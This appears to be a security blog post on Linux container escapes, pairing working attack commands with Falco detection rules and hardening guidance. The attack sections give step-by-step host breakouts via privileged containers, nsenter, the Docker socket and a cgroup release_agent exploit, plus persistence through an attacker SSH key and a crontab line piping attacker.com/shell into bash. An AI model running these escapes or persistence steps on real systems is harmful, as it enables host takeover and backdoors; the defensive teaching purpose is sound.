Containers are not virtual machines. This is one of the most consequential misunderstandings in modern infrastructure security. Where a virtual machine has a full hypervisor isolation layer separating guest and host kernels, a container shares the host kernel directly. The isolation that makes containers lightweight — Linux namespaces and cgroups — is also what makes them escapable when misconfigured or when vulnerabilities are present.
This post examines how container isolation works at the kernel level, walks through the primary escape vectors with working demonstrations, covers real CVEs that enabled escapes, and provides a concrete detection and hardening framework.
How Container Isolation Works
A container is, at its core, a process (or group of processes) on the host with a restricted view of the system. That restriction is implemented through three kernel mechanisms:
Linux Namespaces
Namespaces partition global system resources so that each container sees its own isolated instance:
| Namespace | Isolates |
|---|---|
pid | Process IDs — container processes cannot see host processes |
net | Network interfaces, routing tables, iptables rules |
mnt | Filesystem mount points |
uts | Hostname and domain name |
ipc | System V IPC, POSIX message queues |
user | User and group IDs (remapped) |
cgroup | Cgroup root directory (added in kernel 4.6) |
A container escape fundamentally involves gaining access to the host’s root namespace — the namespace context shared by all host processes.
Control Groups (cgroups)
Cgroups limit resource consumption (CPU, memory, disk I/O, network) for process groups. They do not provide security isolation but they are critical for container functionality.
Linux Capabilities
Root on Linux is not monolithic. The kernel divides root’s traditional privileges into discrete capabilities: CAP_NET_BIND_SERVICE, CAP_SYS_ADMIN, CAP_CHOWN, etc. Docker drops many capabilities by default but retains a set sufficient for typical application use. The key attack surface: any capability that enables interaction with the host kernel in dangerous ways.
Escape Vector 1: Privileged Container
The most common and straightforward escape path is a container run with --privileged or with privileged: true in its Kubernetes pod spec.
Attack Flow
- Attacker gains code execution inside a privileged container (RCE via web app vulnerability, supply chain attack on container image, etc.)
- Container process can access all host devices via
/dev - Attacker mounts the host filesystem by identifying and mounting the host’s root disk
1# Step 1: Confirm we're in a privileged container
2cat /proc/1/status | grep CapEff
3# CapEff: 0000003fffffffff (all capabilities enabled = privileged)
4
5# Step 2: Identify the host disk device
6fdisk -l 2>/dev/null | grep "^Disk /dev/sd"
7# or: lsblk
8
9# Step 3: Mount host root filesystem
10mkdir /tmp/hostfs
11mount /dev/sda1 /tmp/hostfs
12
13# Step 4: Chroot into host filesystem for full interactive access
14chroot /tmp/hostfs /bin/bash
15
16# Now we have a root shell on the host filesystem
17cat /etc/shadow
18ls /root/
19crontab -l # read host cron jobs
20
21# Step 5: Persistence — add SSH key to host root
22mkdir -p /tmp/hostfs/root/.ssh
23echo "ssh-rsa AAAA...attacker_key..." >> /tmp/hostfs/root/.ssh/authorized_keys
24
25# Or write a host-level cron job
26echo "* * * * * root curl http://attacker.com/shell | bash" >> /tmp/hostfs/etc/crontab
Alternative: Privileged + nsenter
1# Use nsenter to enter host namespaces directly
2# PID 1 on the host is visible from a privileged container
3nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
4
5# This drops you into a bash shell in ALL host namespaces
6# Equivalent to running bash directly on the host
7hostname # shows host hostname, not container hostname
8ps aux # shows all host processes
Escape Vector 2: Docker Socket Mount
When /var/run/docker.sock is mounted inside a container, any process in that container can talk to the Docker daemon — which runs as root on the host with full container management authority.
This is extremely common in CI/CD pipelines (Jenkins, GitLab Runner, Drone) that mount the Docker socket to enable “Docker-in-Docker” builds.
Attack Flow
- Attacker gains code execution inside a container with
/var/run/docker.sockmounted - Docker CLI (or HTTP API via curl/python) is used to create a new container
- The new container is started with privileged mode and the host filesystem mounted
- Attacker executes commands in the new container to interact with the host
1# Step 1: Verify Docker socket is available
2ls -la /var/run/docker.sock
3# srw-rw---- 1 root docker /var/run/docker.sock
4
5# Step 2: If Docker CLI is not available, use curl with Unix socket
6curl --unix-socket /var/run/docker.sock http://localhost/version
7
8# Step 3a: Docker CLI approach — spawn privileged container with host fs
9docker run -v /:/hostfs -it --privileged alpine chroot /hostfs /bin/bash
10
11# Step 3b: API approach using curl (no docker CLI required)
12# Create container
13curl --unix-socket /var/run/docker.sock \
14 -H "Content-Type: application/json" \
15 -d '{
16 "Image": "alpine",
17 "Cmd": ["/bin/sh", "-c", "chroot /hostfs cat /etc/shadow"],
18 "HostConfig": {
19 "Binds": ["/:/hostfs:rw"],
20 "Privileged": true
21 }
22 }' \
23 -X POST http://localhost/containers/create?name=escape
24
25# Start the container and get output
26curl --unix-socket /var/run/docker.sock \
27 -X POST http://localhost/containers/escape/start
Escape Vector 3: CVE-2019-5736 (runc Binary Overwrite)
CVE-2019-5736, discovered by Adam Iwaniuk and Borys Popławski, allowed a malicious container to overwrite the host runc binary and achieve code execution as root on the host.
Affected versions: runc < 1.0-rc6, Docker < 18.09.2, containerd < 1.0.3
Vulnerability mechanism: During docker exec, runc opens /proc/self/exe (which points to the runc binary on the host) via a symlink in the container filesystem. By controlling when and how this symlink resolves, the container can write to the host runc binary while it is being executed.
Conceptual Attack Flow
- Attacker creates a malicious container image with a custom init binary that replaces itself with a symlink to
/proc/self/exeat the right moment - When
docker execis invoked on the container, runc opens the symlink - The container replaces the symlink target with a write-open to
/proc/self/exe - The container writes a malicious payload over the runc binary on the host
- On the next container exec, the malicious binary runs as root on the host
1# Detection: check runc version
2runc --version
3# runc version 1.0-rc6+ (patched) should show >= 1.0-rc6
4
5# Check Docker version (includes runc version)
6docker version | grep -A5 "Server:"
7
8# Verify runc binary integrity
9sha256sum $(which runc)
10# Compare against known-good hash from distribution vendor
Patch released: February 11, 2019. CVSS: 8.6.
Escape Vector 4: CVE-2022-0492 (cgroup v1 release_agent)
This vulnerability abused the release_agent feature in cgroup v1. When a cgroup becomes empty (all processes exit), the kernel executes the script specified in release_agent as root in the host namespace.
Conditions required for exploitation:
- Container must have
CAP_NET_ADMINcapability or be able to mount cgroup filesystems - cgroup v1 must be in use (not cgroup v2)
- User namespaces must be available
1# Step 1: Check if cgroup v1 is available and we can mount it
2cat /proc/1/cgroup | head -5
3# If output shows legacy cgroup paths (e.g., /sys/fs/cgroup/memory), cgroup v1 is active
4
5# Step 2: Create a new cgroup hierarchy with a release_agent
6mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
7mkdir /tmp/cgrp/x
8
9# Step 3: Set up the release_agent to write host root access
10echo 1 > /tmp/cgrp/x/notify_on_release
11host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
12echo "$host_path/exploit" > /tmp/cgrp/release_agent
13
14# Step 4: Write the payload that runs on the host
15cat > /exploit << 'EOF'
16#!/bin/sh
17ps aux > /output
18chmod 777 /output
19EOF
20chmod a+x /exploit
21
22# Step 5: Trigger cgroup empty notification by starting and killing a process
23sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs && exit"
24
25# Step 6: Read the output file that was written by the host-level release_agent
26cat /output # Contains host process listing
Patch released: February 2022, kernel 5.17-rc3. CVSS: 7.8.
Real Incident: Docker Daemon Exposed Over TCP
In 2019, multiple cryptocurrency mining campaigns (tracked by Palo Alto Unit 42 and Aqua Security) exploited Docker daemons that had been configured to listen on TCP port 2375 without TLS authentication — a configuration explicitly warned against in Docker documentation but commonly found in development environments.
Attack pattern:
- Masscan/Shodan enumeration for port 2375 open on the internet
- Connection to unauthenticated Docker API:
curl http://target:2375/containers/json - Deploy a new container with host
/mounted - Install cryptocurrency miner (XMRig) as a persistent host process via cron or systemd
Aqua Security estimated over 400 honeypot hits per day at the peak of these campaigns in 2019. Similar attacks targeting exposed Kubernetes API servers ran in parallel.
Detection with Falco
Falco is the de facto standard for runtime security monitoring of containers. It uses eBPF or kernel module probes to detect syscall-level anomalies.
1# /etc/falco/rules.d/container-escape.yaml
2
3# Detect privileged container creation
4- rule: Create Privileged Container
5 desc: Detect creation of a privileged container
6 condition: >
7 container.id != host
8 and evt.type = container
9 and container.privileged = true
10 output: >
11 Privileged container started (user=%user.name command=%proc.cmdline
12 container_id=%container.id image=%container.image.repository)
13 priority: WARNING
14 tags: [container, privilege-escalation, T1611]
15
16# Detect Docker socket access from within a container
17- rule: Docker Socket Accessed from Container
18 desc: Detect access to Docker socket from inside a container
19 condition: >
20 open_write
21 and container
22 and fd.name = /var/run/docker.sock
23 output: >
24 Docker socket accessed inside container (user=%user.name
25 command=%proc.cmdline container=%container.name)
26 priority: CRITICAL
27 tags: [container, escape, T1611]
28
29# Detect nsenter execution (namespace escape tool)
30- rule: nsenter Executed in Container
31 desc: Detect nsenter used to enter host namespaces
32 condition: >
33 spawned_process
34 and container
35 and proc.name = nsenter
36 output: >
37 nsenter executed in container (user=%user.name args=%proc.args
38 container=%container.name pid=%proc.pid)
39 priority: CRITICAL
40
41# Detect mount of host /proc or /dev
42- rule: Sensitive Host Filesystem Mounted
43 desc: Detect mounting of sensitive host paths
44 condition: >
45 spawned_process
46 and container
47 and proc.name = mount
48 and (proc.args contains "/proc" or proc.args contains "/dev" or proc.args contains "/sys")
49 output: >
50 Sensitive host filesystem mounted in container
51 (command=%proc.cmdline container=%container.name)
52 priority: CRITICAL
Audit Log Monitoring
1# Kubernetes audit log: detect privileged pod creation
2# Query audit logs for pods with privileged security context
3cat /var/log/kubernetes/audit.log | \
4 python3 -c "
5import sys, json
6for line in sys.stdin:
7 try:
8 event = json.loads(line)
9 if event.get('verb') in ['create', 'update'] and \
10 event.get('objectRef', {}).get('resource') == 'pods':
11 spec = event.get('requestObject', {}).get('spec', {})
12 for container in spec.get('containers', []):
13 sc = container.get('securityContext', {})
14 if sc.get('privileged'):
15 print(f\"ALERT: Privileged pod: {event.get('objectRef',{}).get('name')} by {event.get('user',{}).get('username')}\")
16 except:
17 pass
18"
19
20# Check Docker daemon audit logs (if auditd is configured)
21ausearch -k docker --interpret | grep -E "privileged|/var/run/docker.sock"
Defense and Hardening
Control 1: Rootless Docker
1# Install rootless Docker (requires uidmap package)
2dockerd-rootless-setuptool.sh install
3
4# Verify rootless operation
5docker info | grep "rootless"
6# Should show: rootless: true
7
8# Add to environment
9export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock
Control 2: Seccomp Profiles
Seccomp (Secure Computing Mode) restricts which syscalls a container process can make. The default Docker seccomp profile blocks ~44 syscalls. Apply stricter profiles:
1# Apply the default seccomp profile explicitly
2docker run --security-opt seccomp=/etc/docker/seccomp-default.json myapp
3
4# Use a custom profile that additionally blocks mount
5cat > /etc/docker/seccomp-restricted.json << 'EOF'
6{
7 "defaultAction": "SCMP_ACT_ERRNO",
8 "syscalls": [
9 {
10 "names": ["mount", "umount2", "pivot_root", "clone"],
11 "action": "SCMP_ACT_ERRNO"
12 }
13 ]
14}
15EOF
Control 3: AppArmor / SELinux
1# Verify AppArmor is active for Docker
2docker info | grep -i apparmor
3# Should show: Security Options: apparmor
4
5# Apply a custom AppArmor profile
6cat > /etc/apparmor.d/docker-no-escape << 'EOF'
7#include <tunables/global>
8profile docker-no-escape flags=(attach_disconnected,mediate_deleted) {
9 #include <abstractions/base>
10 deny mount,
11 deny /proc/sysrq-trigger rwklx,
12 deny /proc/mem rwklx,
13 deny /proc/kcore rwklx,
14 deny /sys/** wklx,
15}
16EOF
17apparmor_parser -r /etc/apparmor.d/docker-no-escape
18docker run --security-opt apparmor=docker-no-escape myapp
Control 4: Drop Capabilities and Read-Only Root Filesystem
1# Run with minimal capabilities and read-only filesystem
2docker run \
3 --cap-drop ALL \
4 --cap-add NET_BIND_SERVICE \
5 --read-only \
6 --tmpfs /tmp \
7 --security-opt no-new-privileges \
8 myapp
9
10# Equivalent Kubernetes pod spec
11cat << 'EOF'
12securityContext:
13 runAsNonRoot: true
14 runAsUser: 1000
15 allowPrivilegeEscalation: false
16 readOnlyRootFilesystem: true
17 capabilities:
18 drop:
19 - ALL
20 add:
21 - NET_BIND_SERVICE
22EOF
Control 5: OPA Gatekeeper Policy
1# Gatekeeper ConstraintTemplate to block privileged containers
2apiVersion: templates.gatekeeper.sh/v1beta1
3kind: ConstraintTemplate
4metadata:
5 name: k8spspprivilegedcontainer
6spec:
7 crd:
8 spec:
9 names:
10 kind: K8sPSPPrivilegedContainer
11 targets:
12 - target: admission.k8s.gatekeeper.sh
13 rego: |
14 package k8spspprivilegedcontainer
15 violation[{"msg": msg}] {
16 container := input.review.object.spec.containers[_]
17 container.securityContext.privileged == true
18 msg := sprintf("Container %v must not run as privileged", [container.name])
19 }
20---
21apiVersion: constraints.gatekeeper.sh/v1beta1
22kind: K8sPSPPrivilegedContainer
23metadata:
24 name: psp-privileged-container
25spec:
26 match:
27 kinds:
28 - apiGroups: [""]
29 kinds: ["Pod"]
MITRE ATT&CK Mapping
- T1611 — Escape to Host: Adversaries may break out of a container to gain access to the host operating system.
- T1610 — Deploy Container: Deploy a malicious container into a compromised environment to facilitate escape.
- T1552.007 — Container API: Access container runtime APIs to gather credentials or escalate privileges.
Related Attacks in This Series
- Kubernetes RBAC Misconfiguration: Privilege Escalation
- Cloud Account Takeover: Leaked AWS Keys and Crypto Mining
- Serverless Injection: Attacking Lambda Through Event Data
- S3 Bucket Breach: Misconfigured Permissions and Data Leaks
References
- CVE-2019-5736 — runc Container Escape
- CVE-2022-0492 — Linux Kernel cgroup v1 Escape
- MITRE ATT&CK T1611 — Escape to Host
- Falco — Container Runtime Security
- Docker Security Documentation — Seccomp
- Aqua Security — Docker TCP Exposure Research
- Palo Alto Unit 42 — Exposed Docker Daemons
- NSA/CISA Kubernetes Hardening Guide





